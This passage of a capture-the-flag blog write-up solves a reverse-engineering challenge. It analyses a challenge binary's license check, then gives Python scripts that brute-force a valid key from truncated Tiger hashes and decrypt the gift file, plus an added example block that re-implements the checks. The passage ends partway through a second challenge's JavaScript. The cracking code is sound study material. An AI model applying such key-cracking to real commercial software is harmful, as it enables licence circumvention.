srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-1024x512.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-300x150.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-768x384.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-1536x768.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-87-2048x1025.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"741\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-1024x741.png\" alt=\"\" class=\"wp-image-1849\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-1024x741.png 1024w, 
https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-300x217.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-768x556.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88-1536x1112.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-88.png 1716w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{wEb3_4oR_Th3_Win}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.22] Santa&#8217;s Gift Encryptor<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-40.png\" alt=\"\" class=\"wp-image-1741\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>darkice<\/em>. Keeping gifts safe!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa takes security very seriously and encrypts all his gifts. However, his elves were very busy this year and could not finish the work on the new encryption tool, and therefore it is not possible to decrypt the gifts now. As Christmas is coming closer and closer, we urgently need someone who can finish their work so that the children won&#8217;t be left without presents. And if that wasn&#8217;t already bad enough, Santa has also lost his license key, but that&#8217;s probably the least of our problems.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Find the key for Santa and decrypt&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/0fc3fe0c-8e6f-4a35-bbc7-a430d7c094c6.zip\" target=\"_blank\" rel=\"noreferrer noopener\">your own gift<\/a>!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Typically, I am no fan of reverse engineering challenges, but I liked this one very much! 
With the challenge comes an ELF binary &#8220;sge&#8221; and a file &#8220;gift.enc&#8221; which contains the encrypted message\/flag. I used Ghidra to analyze the binary file. <\/p>\n\n\n\n<p>The main function calls three functions if the binary file is opened correctly. <\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"602\" height=\"448\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-89.png\" alt=\"\" class=\"wp-image-1851\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-89.png 602w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-89-300x223.png 300w\" sizes=\"auto, (max-width: 602px) 100vw, 602px\" \/><\/figure>\n\n\n\n<p>The first function (FUN_00100e2a) is for checking the license string:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"790\" height=\"720\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-90.png\" alt=\"\" class=\"wp-image-1853\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-90.png 790w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-90-300x273.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-90-768x700.png 768w\" sizes=\"auto, (max-width: 790px) 100vw, 790px\" \/><\/figure>\n\n\n\n<p>The license check does mainly 4 things to evaluate if the license is correct:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Line 15-17:<\/strong> the license needs to be 29 characters long<\/li>\n\n\n\n<li><strong>Line 18-23:<\/strong> Every 6th character needs to be a dash &#8220;-&#8220;<\/li>\n\n\n\n<li><strong>Line 24-27:<\/strong> Defines the character set for the characters between the &#8220;-&#8220;: 0-9; A-Z; a-z<\/li>\n\n\n\n<li><strong>Line 30-37:<\/strong> Sends groups of five characters, between the &#8220;-&#8220;, to FUN_00102716 and checks the first 3 of 5 (!) 
if they match with the corresponding characters of the string &#8220;S4nT4s3NcrYpt0r&#8221;. 1st -&gt; &#8220;S4n&#8221;, 2nd -&gt; &#8220;T4s&#8221;, 3rd -&gt; &#8220;3Nc&#8221;, 4th -&gt; &#8220;rYp&#8221;, 5th -&gt; &#8220;t0r&#8221;<\/li>\n<\/ol>\n\n\n\n<p>The function FUN_00102716 must be some hashing algorithm. Let us examine this function next. One of the functions called by FUN_00102716 is this one:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"562\" height=\"384\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-91.png\" alt=\"\" class=\"wp-image-1854\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-91.png 562w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-91-300x205.png 300w\" sizes=\"auto, (max-width: 562px) 100vw, 562px\" \/><\/figure>\n\n\n\n<p>We google for the constant &#8220;0xa5a5a5&#8230;&#8221; and eventually find <a href=\"http:\/\/www.cas.mcmaster.ca\/~cs3is3\/course-files\/LN6-2021.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">a presentation about hash functions<\/a>, and there we find a function called &#8220;Tiger hash&#8221; which exactly matches our description. <\/p>\n\n\n\n<p>We now have everything to bruteforce the license key. But first we want to understand the whole application. Let&#8217;s go back to the main function:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"630\" height=\"420\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-92.png\" alt=\"\" class=\"wp-image-1855\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-92.png 630w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-92-300x200.png 300w\" sizes=\"auto, (max-width: 630px) 100vw, 630px\" \/><\/figure>\n\n\n\n<p>The main function checks the license, then calls the tiger_hash function once again with the license key (!) 
and sends the computed hash to the function FUN_00100b14. The next step is to look at this last unknown function, which must be the encryption function.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"715\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-715x1024.png\" alt=\"\" class=\"wp-image-1857\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-715x1024.png 715w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-210x300.png 210w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-768x1099.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1-1073x1536.png 1073w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/encryption1-1.png 1312w\" sizes=\"auto, (max-width: 715px) 100vw, 715px\" \/><\/figure>\n\n\n\n<p>I highlighted the important parts of the disassembled encryption function.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>Line 65:<\/strong> Call to a sub-function, where we find the actual encryption algorithm. In this function we find the constant 0x9e3779b9 which I googled for. Eventually, I found this <a rel=\"noreferrer noopener\" href=\"https:\/\/github.com\/Chronic-Dev\/libgcrypt\/blob\/master\/cipher\/serpent.c\" target=\"_blank\">implementation of the Serpent encryption algorithm<\/a> which looked exactly like our program. <\/li>\n\n\n\n<li><strong>Line 74: <\/strong>The tiger_hash function is called once again, this time on the hashed license key that was passed to this function. See lines 37, 69, 72 to see how the argument for the tiger_hash function is constructed.<\/li>\n\n\n\n<li><strong>Line 101:<\/strong> The result of the tiger_hash function (hashed hash of the license key) is written to a file.<\/li>\n\n\n\n<li><strong>Line 93:<\/strong> The filename ends with &#8220;.enc&#8221;. 
<\/li>\n\n\n\n<li><strong>Line 106:<\/strong> The encrypted message is appended to the same file. <\/li>\n<\/ol>\n\n\n\n<p>We now have figured out everything we need to solve the challenge. This program was used to encrypt a message and store it in the gift.enc file. The first bytes of the gift.enc file contain the hash of the hash of the license! The target hash:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\"6385EF2616C572906C5363A990D41AA9D36AFAA02E1485A7\" <\/pre>\n\n\n\n<p>I used Python and this <a rel=\"noreferrer noopener\" href=\"https:\/\/pypi.org\/project\/tiger\/\" target=\"_blank\">tiger-hash library<\/a>. Unfortunately, this library has a memory leak and I had to save intermediate results and resume the program after my computer killed the program because of Out of Memory errors. <\/p>\n\n\n\n<p>In this first Python script I collect all possible groups of 5 for our license key. As for every group the hash is calculated and the first 3 characters are compared with the corresponding part in the string &#8220;<span style=\"font-size: revert;\">S4nT4s3NcrYpt0r&#8221;<\/span>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import hashlib\nfrom tiger import tiger\nfrom itertools import chain, product, islice\nfrom binascii import hexlify\nimport string\nt = [b\"S\",b\"4\",b\"n\",b\"T\",b\"4\",b\"s\",b\"3\",b\"N\",b\"c\",b\"r\",b\"Y\",b\"p\",b\"t\",b\"0\",b\"r\"]\ncharset = string.ascii_letters + string.digits\nSTART_VALUE = [4, 764688524]\no = 0\nparts = []\nwhile (o &lt; 0x1d):\n\ti = 0\n\tst = b\"\"\n\twhile(i &lt; 3):\n\t\tx = int(i + (o \/ 6) * 3)\n\t\tst += t[x]\n\t\ti += 1\n\tparts.append(st)\n\to += 6\nprint(parts)\ndef convertTuple(tup):\n    str = ''\n    for item in tup:\n        str = str + item\n    return str\nsolutions = []\nparts = 
islice(parts, START_VALUE[0], None)\nfor c, part in enumerate(parts, start=START_VALUE[0]):\n\tprint(part)\n\tref = hexlify(part).lower()\n\tall_combos = product(charset, repeat=5)\n\tcombos = islice(all_combos, START_VALUE[1], None)\n\tsol = []\n\tfor i,current in enumerate(combos, start=START_VALUE[1]):\n\t\ttmp = convertTuple(''.join(current)).encode(\"utf8\")\n\t\th = tiger(tmp).hexdigest()[:6]\n\t\tif (h == ref):\n\t\t\tsol.append(tmp)\n\t\t\tSTART_VALUE[1] = i\n\t\t\tprint(\"Found!\")\n\t\t\tprint(\"Test: \" + str(tmp))\n\t\t\tprint(\"Hash: \" + str(h))\n\t\t\tprint(\"ToBeFound: \" + ref)\n\t\t\tprint(\"Solution: \" + str(sol))\n\t\t\tprint(\"All possibilities: \" + str(solutions))\n\t\t\tprint(START_VALUE)\n\t\t\tprint(\"---\")\n\tsolutions.append(sol)\n\tSTART_VALUE = [c+1, 0]\n\t<\/pre>\n\n\n\n<p>In the second script I calculate the correct license out of all possible groups which I generated before. This way we get back the license which was used to write the gift.enc file. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import hashlib\nimport tiger\nfrom itertools import chain, product, islice\nfrom binascii import hexlify\nimport string\ntarget_hash = \"6385EF2616C572906C5363A990D41AA9D36AFAA02E1485A7\"\nSTART_VALUE = 25\ngroup1 = ['adlsB', 'coFWX', 'dAVjd', 'eqvsO', 'gyfiM', 'gDaZS', 'gIT3S', 'hsotk', 'itmd8', 'juIhA', 'kVDgs', 'ot5ke', 'o3rKT', 'o4YUM',\n\t\t\t\t            'tYHqG', 'uPfTb', 'uUxaL', 'uVJTg', 'vohtO', 'vYE7S', 'x8U0P', 'yUokP', 'zdvgw', 'BXb55', 'Fumzi', 'Gi2vt',\n\t\t\t\t            'Gr16b', 'G007k', 'JxrBh', 'MDgmm', 'MKHsL', 'NtkxJ', 'P3J7T', 'SNmHu', 'TuA2q', 'T7yjy', 'UlwxL', 'UreDP',\n\t\t\t\t            'U0rOF', 'VbVZM', 'V3obI', 'WFego', 'ZSWc9', '2gLoy', '2Aqll', '3AQfq', '7Fy7d', '8pasV']\ngroup2 = ['bnXWw', 'cfr8M', 'ctl8u', 
'ddmFi', 'eAA82', 'eUeDp', 'eXn2h', 'fgaRU', 'fO9Rt', 'iXpFk', 'kECUl', 'lVkn8', 'l5Bve', 'ma5a6',\n\t\t\t\t\t\t    'mjhEz', 'm2iX2', 'nbMi8', 'oqOJe', 'rx6C3', 'tt4w2', 'tSSW5', 't9ilq', 'uRZXH', 'u51ZZ', 'vL7It', 'xMtqG',\n\t\t\t\t\t\t    'ytB9l', 'yJsK2', 'APM7L', 'A3PM0', 'A4ifz', 'A7368', 'CIost', 'DvIZk', 'D8yjm', 'EbkvT', 'EwNHN', 'FMwBO',\n\t\t\t\t\t\t    'IGm3M', 'JGk2f', 'J9eRW', 'OUSxb', 'QFhcz', 'Riazr', 'RAGLI', 'Sd5gV', 'SulIF', 'TwEDx', 'TI3CF', 'TP5Zo',\n\t\t\t\t\t\t    'UKiVs', 'VwoN6', 'VR4Hu', 'XhF9Y', '1RKc2', '2c2Kt', '2kwdU', '2wA68', '2x11q', '4uHIW', '42a9V', '6rLr9',\n\t\t\t\t\t\t    '6stx2', '63zRg', '8jIpC']\ngroup3 = ['azD5T', 'a0Pc4', 'csWhR', 'fiixd', 'fp79w', 'fOKC5', 'gdrFr', 'ieUt4', 'iOAMl', 'kfOy5', 'n9yiN', 'qDVZ5', 'qKB1V', 'r5xAG',\n\t\t\t\t\t\t    'sivTf', 'tLFTx', 'uDM8s', 'vOIzV', 'xmpWp', 'zIx0G', 'BAYEj', 'DtC4I', 'DvE2a', 'DVk9a', 'ElnXm', 'FTpcE',\n\t\t\t\t\t\t    'GKhdq', 'GVanO', 'G0p1a', 'HQboL', 'Nvv07', 'NGdwR', 'Otk5A', 'OAM1e', 'PeN1g', 'P66qO', 'QmupY', 'QN4lW',\n\t\t\t\t\t\t    'SjqYr', 'Skiv5', 'TYDLC', 'UE7A2', 'WssIl', 'WK8eQ', 'XwgNE', 'XDh6A', 'ZdOP9', 'ZfSdH', 'ZhScA', 'ZE1gc',\n\t\t\t\t\t\t    '13XB7', '3cOM8', '31SHQ', '41Itd', '5tnCy', '5RXrU', '8BBSg', '9nzmk', '9CIrU']\ngroup4 = ['bPDoZ', 'fthoz', 'jqEML', 'nlUcI', 'pT3NQ', 'pZFRf', 'quvHH', 's0B4F', 'tIxoq', 'uRWYx', 'vRnkK', 'ySLHn', 'CXcQj', 'DhdFn',\n\t\t\t\t\t\t\t'D0t0J', 'Fts7Y', 'GbzeZ', 'KMG5Y', 'Mm6xs', 'MzKLg', 'OCD3u', 'PkwYk', 'PXF7S', 'Q5Ozd', 'Xkl6J', 'XUnff',\n\t\t\t\t\t\t\t'Y6KPZ', 'Zrlrl', '2fwBV', '2sMn6', '34PVW', '4lZzZ', '4nhP3', '6jraV', '82qlS']\ngroup5 = ['af79P', 'ayyIr', 'boeRp', 'bUNP2', 'd6yQz', 'elYSP', 'gKshj', 'gU7R8', 'idzju', 'iVa5n', 'jtuG0', 'jMUal', 'nHq5j', 'oQfpM',\n\t\t\t\t\t\t\t'oVLfh', 'o0Q24', 'puNbJ', 'u59v1', 'wtSLl', 'xoZ7j', 'xLgEy', 'yk4fu', 'yFSk6', 'yKMxT', 'yXUyL', 'zJbW3',\n\t\t\t\t\t\t\t'zMFUD', 'BM2Xl', 'BWAhp', 'CtBSX', 'CwyDD', 'DYDeW', 'EQrOx', 'HhyG6', 'KkarB', 'KIRjh', 'LEizD', 
'MwTiP',\n\t\t\t\t\t\t\t'O17sm', 'PyYyE', 'QpxUh', 'TLtVK', 'UXhjd', 'VVEMT', 'VWjdf', 'Xob7u', 'ZUIz2', '2FM38', '23WOp', '3jLb2',\n\t\t\t\t\t\t\t'3r8UN', '5KM4W', '51y3N', '74CDh', '8LWcr', '9uBTE', '9Hb8Z']\ndef bruteforce():\n\tgrpslice = islice(group1, START_VALUE, None)\n\tfor x, a in enumerate(grpslice, start=START_VALUE):\n\t\tprint(\"[+] Iteration number: \" + str(x))\n\t\tfor b in group2:\n\t\t\tfor c in group3:\n\t\t\t\tfor d in group4:\n\t\t\t\t\tfor e in group5:\n\t\t\t\t\t\tlicense = a + \"-\" + b + \"-\" + c + \"-\" + d + \"-\" + e\n\t\t\t\t\t\t## double hash\n\t\t\t\t\t\th = tiger.tiger(license.encode(\"utf8\")).digest()\n\t\t\t\t\t\t## - make sure to hash the bytes and not the hexstring!\n\t\t\t\t\t\th = tiger.tiger((h)).hexdigest().upper()\n\t\t\t\t\t\tif h == target_hash:\n\t\t\t\t\t\t\tprint(\"[!! Target Hash Found - exit !!]\")\n\t\t\t\t\t\t\tprint(\"[> License Hash: \" + h)\n\t\t\t\t\t\t\tprint(\"[> Target Hash : \" + target_hash)\n\t\t\t\t\t\t\tprint(\"[>> Correct License is: \" + license)\n\t\t\t\t\t\t\treturn\nbruteforce()<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"414\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93-1024x414.png\" alt=\"\" class=\"wp-image-1858\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93-1024x414.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93-300x121.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93-768x311.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-93.png 1286w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>The license key which was used is: <strong>TuA2q-kECUl-n9yiN-82qlS-af79P<\/strong>. This license key hashed with tiger is our key to decrypt the gift.enc file. 
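<\/p>

<p>Why the two-stage search above is feasible, as an added example (not code from the binary or from the author): a re-implementation of the four license checks together with the search cost they imply. hash_fn stands in for Tiger, which is not in the Python standard library; check_license, expected_prefix and search_cost are hypothetical names, and the estimate assumes uniformly distributed hash output.<\/p>

```python
import string

TARGET = 'S4nT4s3NcrYpt0r'                        # comparison string from the page
CHARSET = string.ascii_letters + string.digits    # a-z, A-Z, 0-9
GROUPS, GROUP_LEN, PREFIX_LEN = 5, 5, 3


def expected_prefix(index):
    '''Hash prefix that group number index must produce: S4n, T4s, 3Nc, rYp, t0r.'''
    return TARGET[index * PREFIX_LEN:(index + 1) * PREFIX_LEN].encode()


def check_license(key, hash_fn):
    '''The four checks from the list above; hash_fn maps bytes to digest bytes.'''
    # 1) 29 characters: five groups of five plus four dashes
    if len(key) != GROUPS * GROUP_LEN + GROUPS - 1:
        return False
    for pos, ch in enumerate(key):
        if pos % 6 == 5:
            # 2) every 6th character is a dash
            if ch != '-':
                return False
        elif ch not in CHARSET:
            # 3) everything else comes from 0-9, A-Z, a-z
            return False
    # 4) each group is hashed on its own and only 3 digest bytes are compared
    for index, group in enumerate(key.split('-')):
        if hash_fn(group.encode())[:PREFIX_LEN] != expected_prefix(index):
            return False
    return True


def search_cost():
    '''Work needed because the groups are verified independently of each other.'''
    per_group = len(CHARSET) ** GROUP_LEN            # 62^5 candidates per group
    survivors = per_group / 256 ** PREFIX_LEN        # expected 24-bit prefix matches
    return {
        'whole_key_candidates': len(CHARSET) ** (GROUPS * GROUP_LEN),
        'stage1_hashes': GROUPS * per_group,          # first script: one hash per candidate
        'expected_survivors_per_group': survivors,
        'expected_stage2_keys': survivors ** GROUPS,  # second script: keys to double-hash
    }


if __name__ == '__main__':
    for name, value in search_cost().items():
        print(name, value)
```

<p>Every key assembled from groups that pass the prefix check is accepted by check_license(); only the double hash stored at the start of gift.enc identifies the one key that was actually used.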
<\/p>\n\n\n\n<p>We need to remove the target hash from the file: <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"263\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94-1024x263.png\" alt=\"\" class=\"wp-image-1859\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94-1024x263.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94-300x77.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94-768x197.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-94.png 1316w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Next is to calculate the tiger-hash of the license key, which results in:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">3147c884a90f10cea8664a5133cc5ae313b04d8271a534ad<\/pre>\n\n\n\n<p>And finally I used <a href=\"http:\/\/serpent.online-domain-tools.com\/\" target=\"_blank\" rel=\"noreferrer noopener\">this online-tool<\/a> to decrypt the file. 
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"835\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95-1024x835.png\" alt=\"\" class=\"wp-image-1860\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95-1024x835.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95-300x245.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95-768x626.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-95.png 1492w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{all_children_thank_you_for_saving_their_gifts}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.23] Pixel Perfect<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-41-1.png\" alt=\"\" class=\"wp-image-1742\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>Dr Nick<\/em>. Quite post-modern, isn&#8217;t it?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Finally, Santa has decided to reply to the Easter Bunny. 
He created a message scrolling across the screen and asked one of the elves to send it, but it seems they&#8217;ve sent it via a very low resolution channel.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-42-1024x256.png\" alt=\"\" class=\"wp-image-1743\"\/><\/figure>\n\n\n\n<p>Please connect to the following pixelization service<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/pixelization.idocker.vuln.land\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/pixelization.idocker.vuln.land\/<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Because it&#8217;s almost Christmas, neither Santa nor the elves have time now, so&#8230; Would you mind restoring the message and forwarding to the Easter Bunny? I mean, if that&#8217;s even possible!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This challenge was hard, mostly because it was very &#8220;guessy&#8221;&#8230; Consequently, I didn&#8217;t like this challenge at all. 
The source code of the JavaScript part within the website looks like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">var canvas = document.getElementById(\"canvasPixelization\");\n    var context = canvas.getContext(\"2d\");\n    let digits = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,12,12,12,12,12,12,12,4,0,0,4,12,12,12,12,12,12,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,20,24,28,32,36,40,44,36,32,32,36,44,40,36,32,28,24,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,28,36,44,52,60,68,76,68,64,64,68,76,68,60,52,44,36,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,60,72,84,96,108,100,96,96,100,108,96,84,72,60,48,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,104,116,104,100,100,104,116,104,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,108,120,108,104,104,108,120,108,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,112,124,112,108,108,112,124,112,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,116,128,116,112,112,116,128,116,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,120,132,120,116,116,116,128,116,
84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,120,132,120,116,116,116,128,116,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,120,132,120,116,116,116,128,116,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,120,132,120,116,116,116,128,116,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,116,128,116,112,112,112,124,112,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,56,68,80,92,116,128,112,108,108,108,120,108,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,52,64,76,88,100,120,132,112,104,104,104,116,104,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,56,72,84,96,108,124,136,116,104,100,100,108,96,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,56,76,92,108,120,132,144,124,112,104,100,100,88,76,64,52,40,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,56,76,92,108,120,132,140,116,100,88,80,76,64,52,44,36,28,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,52,68,84,100,112,124,132,108,92,80,68,60,48,36,28,20,16,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,48,60,72,84,96,108,116,92,80,72,60,52,40,28,20,12,8,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,56,68,80,92,104,116,100,92,88,80,72,60,48,36,24,16,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,40,52,64,76,88,100,112,100,96,96,92,88,76,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,44,56,68,80,92,108,104,108,112,108,104,92,80,64,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,28,3